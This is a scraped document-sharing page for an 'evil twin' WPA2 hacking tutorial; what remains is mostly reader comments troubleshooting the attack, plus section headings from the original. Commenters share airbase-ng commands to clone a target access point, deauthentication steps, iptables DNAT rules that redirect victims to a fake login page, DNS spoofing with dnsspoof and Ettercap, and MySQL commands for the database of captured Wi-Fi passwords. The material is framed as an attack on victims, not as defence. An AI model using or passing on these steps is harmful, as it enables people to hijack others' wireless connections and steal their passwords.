alarm of connecting to an unsecured ap.
REPLY

bud (124 days)
Hey admin.
I have runed the ifconfig and took;
root@root:~# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:579 errors:0 dropped:0 overruns:0 frame:0
TX packets:579 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:71001 (71.0 KB) TX bytes:71001 (71.0 KB)
wlan0 Link encap:Ethernet HWaddr d8:5d:4c:90:5f:c2
inet addr:192.168.1.50 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::da5d:4cff:fe90:5fc2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14006 errors:0 dropped:0 overruns:0 frame:0
TX packets:2940 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4874931 (4.8 MB) TX bytes:314334
WHICH CORRECTION COULD BE MADE IN -gedit /etc/dhcp3/dhcpd.confWHICH YOU HAVE WROTE AS BELOW;
subnet 192.168.2.128 netmask 255.255.255.128 {
option routers 192.168.2.129
range 192.168.2.130 192.168.2.140;
}
THANKS FOR YOUR TIME !
REPLY
cristy (120 days)

i think instead of install a dhcp3 server and set all parametres its easier to do a
dnsspoof on wireless interface, isnt it??
REPLY
sparta (117 days)

thnx for the tuto
i have one quetsion
can i do this with one wifi card
conect to the internet and cloning the ap and deathaunticate the client plz answer
with no damage to my wifi card
REPLY
Pete (114 days)

Hey,
all this might be working I believe.
But when I create my Twin and start airodump I see my created AP but the channel
is constantly changing.Of course nobody can connect
Though my command was like airbase-ng -e APname -c 1 -a C0:25:06:98:50:6E
mon0 so it should send only on ch1 but it doesnt.
Whats going wrong here?
greetz, pete
REPLY
Jess (111 days)

hi !!!
great video . i have a problem . l did all the steps and the fake webpage appears ,
and i try to put password.
but the screen shows.
Please try again Cant locate the db.
and after i start mysql
Enter password:
Type
mysql> use wpa2;
You can turn off
Database changed
mysql>
i type the password but in nothin appears plz help me
Thanks
REPLY
Marcus (102 days)
This is great tutorial but could you tell me please do you need to be connected to the
internet in the first place in order to crack it. Is it possible to do that without being
connected to the net help me please.
Thanks
REPLY
John Nuber (93 days)

Hello and help
First I am familiar with this approach and the work of Douglas from weaknet labs as
he has produced a phishing program in his distro for WPA Enterprise which can be
adapted for WPA shared keys etc. All aspects of the weaknet labs program are
working.
I have managed to get your program up and working. I can associate to the phoney
AP BUT I cannot get your web pages to show up in the targets computer when the
victim tries to surf the net. The pages do show up in my computer.
My Apache2 gives me a warning and then goes to 127.0.0.1 and this does run up the
web pages in the /VAR/WWW/ folder in my computer.
I am running two rtl8187 USOW36H recievers wlan0 and wlan1. wlan1 is assoicated
to another wifi reciever and has internet access. I have used both the IP of wlan1 and
the IP of the associated AP. I still cannot get the computer web pages to show up ihe
victims computer.
All other aspects of this approach as far as I could test work great!!
REPLY
Matthieu (90 days)

Hi, Thank you very much for this post!!
I just have a problem with the traffic redirection, the command doesnt work for me.
iptables -t nat -A PREROUTING -p tcp dport 80 -j DNAT to-destination
192.168.240.129:80
iptables -t nat -A POSTROUTING -j MASQUERADE
On the victim machine, I am suposed to be redirected on the Attack Page

(htp://192.168.240.129) but Im not.
Do you know where the problem come from?
Thanks!
REPLY
Matthieu (85 days)

Hi Admin,
I found another way to do it, I used Ettercap-ng with the dns-spoofing plugin and
that worked very well
Thank you for the quality of your blog!!
REPLY
Sangamesh (86 days)

Hi sir, I tried to follow all ur steps, but im stuck in checking mysql and apache
services. i typed localhost in the browser.. bit i got
It works!
Im new to this BT5, so requesting u to help me out..
Thanks, good day:)
REPLY
Asfand (77 days)

hey
I applied all commands.. i got a problem. please help.
The victims router signals does not vanishes..

please help..
thanks in advance.
REPLY
t.vanhuong (74 days)

can et0 is 2nth wireless card?
Please feedback me!
thank
REPLY
Aroz (24 days)

Hello admin.
I am stuck at the last stage. I have done everything said and it works.
But at last when i use mysql. I get this:
ERROR 1146 (42S02) : Table wpa2.content doesnt exist.
REPLY
Mukesh (13 days)

Hi, everyone. for those of you having problems with mySQL here are the commands
and be sure not to leave out the ; after each line.
Start my Sql server as normal.
then:
Login to MySQL:
mysql -u root -p
Create the database (type exactly as it is including;')

use wpa2;
other commands you should play with are:
show databases;
show tables;
INSERT into content values (12345,12345);
This command will list the content:
SELECT * from content;
I hope this helps.

Hacking Wpa 2 Evil Twin Method

Caricato da

Informazioni sul documento

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Hacking Wpa 2 Evil Twin Method

Caricato da

Copyright:

Formati disponibili

While that technique works, it could take an awful long time, especially when brute

Note: Default backtrack user/pass are root/toor

Install dhcp3 and create config file:

Start clone access point:

DeAuthenticate Access Point (poor):

DeAuthenticate Client (recommended):

John (280 days)

admin (280 days)

sickee (280 days)

admin (280 days)

otlin (271 days)

admin (271 days)

darkey (270 days)

admin (270 days)

admin (270 days)

otlin (270 days)

admin (270 days)

michel (270 days)

more explination (sorry my english not to strong):

admin (270 days)

otlin (269 days)

admin (265 days)

darkey (265 days)

admin (265 days)

Vpoint7 (247 days)

Unknown (265 days)

admin (265 days)

darkey (263 days)

sorry for the disturb how to create the database????

darkey (263 days)

darkey (262 days)

admin (256 days)

T!G3R (257 days)

admin (257 days)

Rafael (152 days)

spartacratus (256 days)

admin (256 days)

spartacratus (255 days)

redpen (254 days)

Rehan (254 days)

sparta (253 days)

Jack (251 days)

hey , thanks admin , but i have only one question ..

admin (245 days)

Dohn Joe (245 days)

darkness (241 days)

admin (234 days)

This will create the specifications for the network.

John (241 days)

sergio (239 days)

Boody (232 days)

Bad Biddy (231 days)

admin (231 days)

kira (235 days)

admin (231 days)

Bad Biddy (232 days)

admin (231 days)

admin (231 days)

Blood (228 days)

admin (226 days)

DONZ (228 days)

admin (226 days)

George (227 days)

admin (226 days)